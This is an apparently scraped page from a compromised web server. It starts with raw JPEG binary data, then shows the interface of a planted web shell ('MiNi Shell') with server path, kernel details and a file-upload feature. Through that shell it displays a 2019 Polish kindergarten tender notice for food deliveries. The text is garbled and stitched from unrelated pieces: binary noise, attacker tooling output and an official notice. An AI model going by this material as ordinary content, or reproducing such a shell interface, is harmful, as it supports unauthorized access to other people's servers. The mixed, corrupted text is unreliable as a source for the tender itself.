JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191127/628476-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 628476-N-2019 z dnia 2019-11-27 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Przedszkole Miejskie w Barczewie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">ZAKUP, DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Przedszkole Miejskie w Barczewie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">51135587400000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Słowackiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">7</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">11-010</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Barczewo</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">warmińsko-mazurskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">895 148 396</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">pm.barczewo@wp.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">895 148 396</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://mzoizbarczewo.bip.gmina.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://mzoizbarczewo.bip.gmina.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://mzoizbarczewo.bip.gmina.pl, www.przedszkolebarczewo.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony">nie</span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne">nie</span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny">nie</span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">nie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga">nie</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">ZAKUP, DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">271.2.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci">6</span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">6</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego w BarczewieArtykuły ogólnospożywcze CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1; 15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;03.14.25.00-3;Lp. Nazwa asortymentu Jednostka miary	Ilość1	Jaja kurze z chowu wolnowybiegowego klasa L	Szt.	130002	Makaron dwujajeczny różne kształty w oryginalnych opakowaniach od 400 do 500g pszenica zwyczajna	kg	2003	Makaron drobny gwiazdki,muszelkiop.250-500g	kg	304	Płatki owsiane op 500g	kg	355	Makaron wieloziarnisty spaghetti (brązowy) op 400g	kg	206	Płatki jęczmienne op 500g	kg	307	Kasza manna 1000g	kg	408	Kasza kukurydziana op.250-500g	kg	209	Kasza jaglana op. 400-1000g	kg	5010	Kasza jęczmienna średnia op. 400-1000g	kg	10011	Kasza gryczana prażona op. 400-1000g	kg	12012	Kasza pęczak op. 400-500g	kg	513	Mąka razowa op. 1000g	kg	2014	Mąka pszenna typ 550 op.1000g	kg	50015	Mąka ziemniaczana op.500-1000g	kg	5016	Płatki ryżowe op.250-500g	kg	4017	Ryż biały długoziarnisty op.500g-1000g	kg	13018	Ryż naturalny (brązowy) op.400g-1000g	kg	13019	Cukier biały kryształ, pakowany op.1000g	kg	40020	Dżem niskosłodzony różne smaki op. co najmniej 370g	Szt.	40021	Koncentrat pomidorowy 30% op. co najmniej 190g	Szt.	55022	Sól morska drobna, o niskiej zawartości sodu bez antyzbrylacza, op. 1000g	kg	11023	Kawa zbożowa rozpuszczalna składzboża72%(Jęczmień, żyto),cykoria, burak cukrowy-prażone. Op 150g	Szt.	12024	Kakao prawdziwe op.100-200g	kg	1525	Budyń w proszku różne smaki op. waga co najmniej 40g bez cukru	Szt.	70026	Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g	Szt.	10027	Olej z pierwszego tłoczenia rzepakowy op.900-1000g	L	22028	Olej słonecznikowy op.900-1000g	L	9029	Makaron pełnoziarnisty różne kształty op.500g (brązowy)	kg	15030	Herbata owocowa, saszetki, pakowana, op, co najmniej 25x50g szt	pacz	40031	Herbata miętowa saszetki, pakowana op. co najmniej 20szt	pacz	30032	Herbata granulowanaop.100g	Szt.	22033	Sok pomarańczowy naturalny 100% zawartość cukru do 10g w 100ml gotowego produktu op.1000ml	L	5034	Biszkopty op.250-500g	kg	9035	Sok pomidorowy naturalny 100% op.1000ml( zawartość soli, sodu w 100g gotowego produktu max.10g-12g)	L	2036	Keczup pomidorowy, łagodny w opakowaniach szklanych op. 200g	Szt.	25037	Pieprz mielony prawdziwy bez dodatków w oryginalnych op.co najmniej 15g	Szt.	15038	Pieprz ziołowy w oryginalnych opakowaniach Szt.	4039	Ziele angielskie w oryginalnych opakowaniach op. co najmniej 14g	Szt.	2040	Liść laurowy w oryginalnych opakowaniach Szt.	2041	Kukurydza konserwowa puszka waga ok.400g.	Szt.	10042	Zioła prowansalskie w oryginalnych opakowaniach op.min.10g	Szt.	8043	Proszek do pieczenia	Szt.	1044	Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g	Szt.	6045	Chrzan tarty słoik op. co najmniej 170g z kwaskiem cytrynowym	Szt.	8046	Groszek konserwowy w puszce w oryginalnych op.400g	Szt.	2047	Papryka mielona słodka w oryginalnych op.16g	Szt.	10048	Przyprawa Curry op.20g	Szt.	2049	Przyprawa Kurkuma op.10-20g	Szt.	2050	Majeranek otarty waga co najmniej 6g	Szt.	10051	Wafle suche prostokątne waga co najmniej 146g	Szt.	23052	Rodzynki op.100g	Szt.	5053	Imbir mielony przyprawa	Szt.	554	Cukier waniliowy	Szt.	5055	Kwasek cytrynowyop.20g	Szt.	1056	Musztarda słoik op. co najmniej 180g	Szt.	8057	Miód naturalny wielokwiatowy op.370g	Szt.	175058	Ananas plastry puszka waga bez odcieku co najmniej 565g	Szt.	15059	Cynamon mielony przyprawa	Szt.	560	Goździki przyprawa	Szt.	561	Bazylia suszona przyprawa	Szt.	3062	Mango pulpa, opakowanie min 850 g	Szt.	3063	Soki owocowo-warzywne naturalne 100% op.1000ml(np marchew, jabłko; marchew-banan)	L	2064	Cukier puder op. co najmniej 500g	kg	565	Tymianek suszony waga co najmniej10g	Szt.	1066	Oregano suszone waga co najmniej 10g	Szt.	5067	Fasola czerwona w puszce waga co najmniej 400g	Szt.	15068	Olej z pierwszego tłoczenia rzepakowy z dodatkami(czosnek, bazylia, pomidory) op. co najmniej0,25l	L	569	Soczewica czerwona połówki op. 500-1000g	kg	3070	Pomidory w puszce bez skórki( z otwieraczem) op. co najmniej 400g	Szt.	38071	Kawa zbożowa sypana op. co najmniej 200g	Szt.	2072	Ciecierzyca op. 500-1000g	kg	1073	Drożdże świeże	kg	774	Wafle ryzowe op. 100g	Szt.	35075	Brzoskwinie w puszce	Szt.	30076	Gałka muszkatołowa mielona	Szt.	1077	Kolendra suszona przyprawa	Szt.	1078	Lubczyk suszony przyprawa	Szt.	1079	Rozmaryn suszony przyprawa	Szt.	1080	Kasza kus kus op. 400-1000g.	kg	1081	Kasza bulgur op. 400-1000g.	kg	1082	Kasza orkiszowa op. 400-1000g.	kg	1083	Płatki żytnie op. 400-1000g.	kg	1084	Płatki orkiszowe op. 400-1000g.	kg	1085	Płatki pszenne op. 400-1000g.	kg	1086	Mąka orkiszowa typ 2000, op. 400-1000g.	kg	587	Siemię lniane op. 400-1000g.	kg	488	Wiórki kokosowe op. 400-1000g.	kg	289	Sezam op. 400-1000g.	kg	2CZĘŚĆ 2. Zakup, dostawa i rozładunek mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie CPV: 15.10.00.00-9;15.11.21.00-7Nazwa asortymentu Lp. Nazwa asortymentu	Jednostka miary	Ilość1.	Karkówka surowa wieprzowa bez kości	kg	2802.	Łopatka wieprzowa surowa bez kości	kg	6503.	Wołowina surowa ligawa	kg	2004.	Cielęcina gulaszowa surowa	kg	355.	Szynka wieprzowa surowa bez kości, bez skóry	kg	2006.	Filet z indyka surowy	kg	2007.	Filet z kurczaka surowy	kg	5808.	Schab bez kości surowy wieprzowy	kg	3009.	Udka bez grzbietu z kurczaka surowe	kg	12010.	Antrykot wołowy surowy	kg	2011.	Żebra wołowe surowe	kg	2012.	Porcje rosołowe z kurczaka	kg	4013.	Wątróbka drobiowa surowa	kg	1014.	Parówki wp. cienkie o zwartości co najmniej 71% mięsa wp.	kg	2015.	Łopatka wp. Pieczona skład: łopatka wp min. 73%,woda,sól,naturalne przyprawy.	kg	5016.	Szynka wiejska o wyczuwalnym smaku i zapachu użytych przypraw, mięso wp.min.75%,sól,przyprawy naturalne, woda	kg	7017.	Kiełbasa krakowska sucha .Wyrób w osłonce białkowej. Składniki: mięso wp.(100g produktu otrzymano z 112g mięsa wp.)Wyczuwalny smak i zapach użytych przypraw naturalnych.	kg	3018.	Kiełbasa krakowska parzona baton. Kiełbasa gruborozdrobniona,,wędzona i parzona. Mięso wp. min 63%,sól,woda,przyprawy naturalne wyczuwalne w smaku.	kg	3019.	Polędwica sopocka wp. klasa I .Mięso wp.(schab b/k) min.90%,woda,sól,przyprawy naturalne.	kg	10020.	Szynka wp. gotowana. kl.I. Mięso wieprzowe min 80%.woda,sól,przyprawy naturalne.	kg	7021.	Kiełbasa cienka wp. podsuszana o zawartości mięsa min.72%.	kg	4022.	Filet wędzony z indyka o zawartości mięsa z indyka min 80%,woda, sól, przyprawy naturalne wyczuwalne w smaku i zapachu.	kg	5023.	Karkówka pieczona, Mięso wp.min 82%,woda,sól,przyprawy naturalne.	kg	5024.	Filet drobiowy gotowany, mięso z fileta drobiowego min 80%,woda, sól, przyprawy naturalne wyczuwalne w smaku i zapachu.	kg	5025.	Schab pieczony, mięso wp. min 90%,sól,woda,przyprawy naturalne wyczuwalne w smaku.	kg	3026.	Kiełbasa żywiecka podsuszana wp. baton, mięso wp min 80%,sól,woda,przyprawy naturalne.	kg	60 CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków, warzyw, jarzyn, owoców, owoców tropikalnych, orzechów.CPV: 03.20.00.00-3; 0,.22.00.00-9;03.22.21.10-7Lp. Nazwa asortymentu Jednostka miary	Ilość1	Ziemniaki	kg	60002	Ziemniaki młode	kg	8003	Marchew świeża korzeń	kg	14004	Pietruszka świeża korzeń	kg	1505	Cebula biała	kg	2006	Cebula czerwona	kg	407	Seler świeży korzeń	kg	2508	Por świeży	kg	2509	Kapusta czerwona świeża	kg	15010	Pieczarki świeże kg	2011	Czosnek kraj pochodzenie polska główka Szt.	10012	Szczypior świeży pęczek	Szt.	70013	Rzodkiewka pęczek	Szt.	80014	Rzodkiew biała świeża	kg	10015	Sałata lodowa ,pakowana główka	Szt.	32016	Sałata zielona świeża główka	Szt.	35017	Pomidory czerwone, świeże	kg	55018	Ogórek św. szklarniowy	kg	35019	Ogórek świeży, zielony gruntowy	kg	20020	Ogórek kwaszony	kg	25021	Kapusta kwaszona biała	kg	22022	Kapusta pekińska kg	20023	Kapusta biała słodka, główka	kg	20024	Kapusta biała młoda, główka	kg	5025	Papryka czerwona , żółta, zielona	kg	35026	Cytryna świeża	kg	25027	Jabłka świeże	kg	300028	Banany świeże	kg	120029	Gruszki świeże	kg	70030	Kiwi świeże	kg	20031	Mandarynki świeże	kg	30032	Winogrona zielone bezpestkowe	kg	26033	Śliwka fioletowa duża	kg	10034	Brzoskwinie	kg	12035	Winogrona granatowe bezpestkowe	kg	10036	Koper zielony, świeży pęczek 100g	Szt.	100037	Natka pietruszki świeża pęczek 100g	Szt.	100038	Burak czerwony świeży	kg	60039	Truskawka świeża (w sezonie)	kg	15040	Arbuz	kg	20041	Fasola sucha średnia op.400-1000g	kg	2542	Groch połówki op. 400-1000g	kg	2543	Ogórek małosolny (w sezonie)	kg	2044	Nektarynki	kg	9045	Pomarańcze	kg	35046	Pestki słonecznika op.50-100g łuskane	kg	1547	Żurawina suszona op.250-1000g	kg	2048	Kalafior świeży	Szt.	10049	Brokuły świeże	Szt.	10050	Botwinka pęcz	10051	Morele suszone	kg	552	Cukinia	kg	3053	Czereśnia (w sezonie)	kg	2054	Bakłażan kg	1555	Dynia	kg	2056	Pestki dyni op. 50-100g łuskane	kg	557	Daktyle suszone, bez pestek	kg	258	Seler naciowy	kg	1059	Mango świeże	kg	3060	Kiełki brokuła	kg	1 CZĘŚĆ 4. Zakup, dostawa i rozładunek mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone, warzywa i owoce mrożone) CPV 15.20.00.00-0;15.33.11.70-9,15.89.60.00-5;15.89.43.00-4) Lp.	Nazwa asortymentu Jednostka miary	Ilość1	Włoszczyzna 4-składnikowa (marchew, por, seler, pietruszka)op.2000-2500g	kg	15002.	Mieszanka 7-składnikowa z kapustą brukselką op. 2000-2500g	kg	2003.	Brokuły mrożone 450g-2500g	kg	2504.	Kalafior mrożony op.450-2500g	kg	1505	Fasolka szparagowa żółta cięta op.450-2500g	kg	1006	Fasolka szparagowa zielona cięta op.450-2500g	kg	1007	Szpinak mrożony mielony.op.450-2500g	kg	1008	Groszek zielony mrożony op.450-2500g	kg	1009	Barszcz ukraiński skład: burak ćwikłowy, kapusta, fasola, marchew, pomidor, seler, cebula) op.450-2500g	kg	9010	Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g	kg	20011	Sałatka owocowa 8 składnikowa (ananas, melon, jabłko, brzoskwinia, mandarynka, papaja, winogrona, mango) op.400g-2500g	kg	8012	